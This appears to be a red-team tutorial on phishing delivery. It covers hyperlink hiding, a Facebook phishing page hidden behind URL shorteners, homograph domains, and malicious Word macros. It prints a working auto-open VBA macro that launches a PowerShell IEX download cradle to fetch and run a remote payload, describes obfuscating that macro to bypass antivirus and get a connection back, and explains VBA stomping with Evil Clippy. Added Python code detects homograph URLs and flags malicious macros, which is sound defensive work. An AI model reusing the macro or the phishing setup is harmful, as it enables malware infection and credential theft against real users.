Links and Attachments

An approach to better understand this technique at a deeper level

This is a well-known phishing technique, commonly used to avoid the email provider's sandboxes. (More on Sandbox). In a nutshell, a sandbox isolates suspicious software and executes it in a "jailed" environment so it cannot harm the host device.

Let's work on some techniques that can help with links.

When you receive an email with a coupon for Walmart, you will always be sent somewhere else to type in your information. But scammers and phishers, to save time, are sometimes "lazy" and send things "as-is"; this is usually very detectable, and we can tell right away that it's an illegitimate coupon.

Let's check a sample from my spam folder:

Look, lucky me, my AV protection is going to expire on "$date", time to renew! Looking closer, we can tell that a little bit of thought went into this: a hyperlink was applied to the word "HERE", which looks legit. But what happens when I hover over the "HERE" text?

What a weird-looking directory, but it has to be legit, right? It is hosted on a Google page. Let's visit the subdomain.

As you can see, hyperlinks are a great way to hide malicious links, but anyone with security awareness knows that this is an illegitimate email.

Shortening Technique

This technique shortens very long URLs and hides malicious ones behind links from legitimate URL-shortening services. Some very popular ones are:

  • Bitly

  • Rebrandly

  • Clkim

  • TinyURL

As these are widely used by commercial services, they can sometimes slip by even a trained eye, so be wary of them as potentially malicious.

Let's set one up:

We run our preferred phishing tool: a simple Facebook website for phishing.

We see it is currently using the IP and port number. This can be fixed with more tools (ngrok), but from here let's simply copy that IP, shorten it and send it.

So now we can use that shortened link! Let's see it in action.

We see how users can be tricked even with a legitimate shortener, and these are even easier to use with more advanced techniques that require less text.

Homograph Technique

A homograph attack is a method of deception wherein a threat actor leverages the similarities between character scripts to create and register phony versions of existing domains, fooling users and luring them into visiting. Here is an example:

https://dmϲxblue.net

https://dmcxblue.net

To the naked eye they look very similar, but try copying and pasting both of them into the URL bar: you will notice that one of them doesn't get resolved correctly. Why is that? Because the incorrect one uses the Greek Lunate Sigma Symbol while the other is just a regular "c". Being wary of this technique is very valuable, as domains can be registered and then used with these unique characters.
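The difference between the two URLs above can be made visible programmatically; this is an added example, not code from the original page. It approximates a character's script by the first word of its Unicode name and uses Python's built-in IDNA 2003 codec, both of which are simplifications chosen for this sketch.

```python
import unicodedata
from urllib.parse import urlsplit

def label_scripts(label):
    """Approximate each letter's script by the first word of its Unicode name."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0]
            for ch in label if ch.isalpha()}

def inspect_url(url):
    """Report non-ASCII code points, mixed-script labels and the ASCII form of the host."""
    host = urlsplit(url).hostname or ""
    non_ascii = [(f"U+{ord(ch):04X}", unicodedata.name(ch, "UNKNOWN"))
                 for ch in host if not ch.isascii()]
    # A single label that mixes scripts (Latin plus Greek here) is the red flag;
    # a label written entirely in one non-Latin script can be a legitimate IDN.
    mixed = [label for label in host.split(".") if len(label_scripts(label)) > 1]
    try:
        # Built-in codec follows IDNA 2003; browsers apply newer rules, so this
        # approximates the xn-- name that is actually looked up.
        a_label = host.encode("idna").decode("ascii")
    except UnicodeError:
        a_label = None
    return {"host": host, "non_ascii": non_ascii,
            "mixed_script_labels": mixed, "a_label": a_label,
            "suspicious": bool(mixed)}

# The two URLs shown on this page; the lookalike is written with an escape
# so the Greek Lunate Sigma Symbol (U+03F2) is unambiguous.
LOOKALIKE = "https://dm\u03f2xblue.net"
GENUINE = "https://dmcxblue.net"

if __name__ == "__main__":
    for url in (LOOKALIKE, GENUINE):
        print(inspect_url(url))
```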

Attachments

Just as the name implies, this is a file attached to the email. Attachments require more work, as the email providers have sandboxes and their own methods for scanning malicious files. From here we will skip the email, go straight to the machine and work on a few methods.

Macros - Obfuscation

Macros are a very popular one: a set of automated processes that execute when the file is opened. There are some great tools that can automate this procedure, but I will demonstrate a simple VBA macro.

We will use Word for this demonstration. It is very easy to set up: open a Word document >> Options >> Ribbons >> Developer. This enables the Developer tab and gives us the ability to add macros and our VBA code.

We see here that we are sending a Bitcoin wallet or an encrypted message to the user, making them believe that they need to "Enable Macros" for its proper decryption; just find a proper excuse to have this feature enabled.

Now let's work on the VBA code part. We can move to the Developer tab, choose the VBA button and proceed to add our VBA code.

Sub Auto_Open()
    Dim exec As String
    Dim testvar As String
    exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://0.0.0.0/payload.txt'))"""
    Shell (exec)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

Let's read this code a little.

  • Sub: A Sub procedure is a series of Visual Basic statements enclosed by the Sub and End Sub statements.

  • Dim: Stands for dimension; used to declare variables in Visual Basic with a proper data type definition.

  • Exec: Runs the specified program or command by using the specified arguments.

  • Shell: Runs an executable program and returns a Variant (Double) representing the program's task ID if successful; otherwise, it returns zero.

Let's add this code to our macro and edit it to our needs, such as the IP address and the payload being called.

Demo:

But this is a very simple method, and any AV would detect it, as it is simple to read and verify what the VBA script is doing. Our AV was suspended; now let's turn it on and see what happens with an AV running.

And then we see it.

A warning that our AV found the macro to be malicious. Why is that? The PowerShell command line used is very well known from techniques for downloading scripts and executing them in memory. But let's try obfuscating our code. As much as I would love to, I will not release the script I used to make this obfuscation, since I don't want it detected any time soon.
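The kind of static check that flags the plain macro, as an added example that is not part of the original page and not any AV vendor's actual rule set. The indicator names, patterns and verdict levels are assumptions of this sketch; the first sample is the macro shown on this page and the second is a constructed benign one.

```python
import re

# Indicator names and groupings are this example's own, not a vendor's rules.
INDICATORS = {
    "auto_exec": r"^\s*(?:Private\s+|Public\s+)?Sub\s+(?:Auto_?Open|Workbook_Open|Document_Open)\b",
    "process_launch": r"\b(?:Shell|CreateObject)\b",
    "powershell": r"powershell",
    "download_cradle": r"downloadstring|\bIEX\b|Invoke-Expression",
    "url": r"https?://",
}

def triage_macro(source):
    """Return ({indicator: [line numbers]}, verdict) for VBA source text."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if re.search(pattern, line, re.IGNORECASE):
                hits.setdefault(name, []).append(lineno)
    # Code that runs on open AND starts a process is the dangerous combination.
    runs_on_open = hits.keys() >= {"auto_exec", "process_launch"}
    fetches_code = "download_cradle" in hits or "powershell" in hits
    if runs_on_open and fetches_code:
        verdict = "block"
    elif hits:
        verdict = "review"
    else:
        verdict = "none"
    return hits, verdict

# The macro shown above on this page, embedded so the example runs stand-alone.
PAGE_MACRO = '''Sub Auto_Open()
    Dim exec As String
    Dim testvar As String
    exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://0.0.0.0/payload.txt'))"""
    Shell (exec)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub'''

# Constructed benign macro: runs on open but only shows a message box.
BENIGN_MACRO = 'Sub AutoOpen()\n    MsgBox "Hello"\nEnd Sub'
```

Matching on readable strings like this is what renamed variables and encoded command lines are meant to defeat, and the check reads only the stored source text, not the p-code covered under VBA stomping.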

But here is a sample of the obfuscation applied to the VBA code:

It's somewhat simple to understand: variable names have been switched to random strings, the code has been encrypted with XOR, and I also used a PowerShell one-liner that bypasses current AV, as well as a custom PS1 script. (I went all out for this one).

So let's check our new payload now that AV is enabled, and try to get a connection back to our attacking machine.

VBA Stomping - (Evil Clippy)

Evil Clippy is a tool released at BlackHat Asia in 2019. It is a maldoc assistant which helps red teams bypass popular AV and get an initial foothold. In this category we will focus on the VBA stomping technique, discovered years ago by Dr. Vesselin Bontchev (here). At a high level, when creating a malicious document we can place a non-malicious macro in the source code of the file; as explained by Dr. Bontchev, what actually executes is the p-code stored in the document, as long as it is compatible with the current VBA version.

Let's work with some samples. A non-malicious macro is created: a message box is to be displayed when the document is opened.

Now from here we want to modify the VBA source code while leaving the p-code unchanged. To edit this file you will unzip it and edit the vbaProject.bin file using a hex editor, but only within the VBA source code storage location, not the p-code section.

Now that the VBA source code has been manually edited we will open the document and inspect the VBA Code BEFORE the "Enable Content" button is clicked.

We see here that the source code still displays XYZ, but in fact, once the content is enabled, we see a message box displaying "ABC".

Well, what happened here? Our source code stated that XYZ was going to be executed, but instead ABC was displayed, and later on our code updated to match the execution.

As Dr. Bontchev explains, the p-code stored in the document is what actually executes.

More info on this attack here.
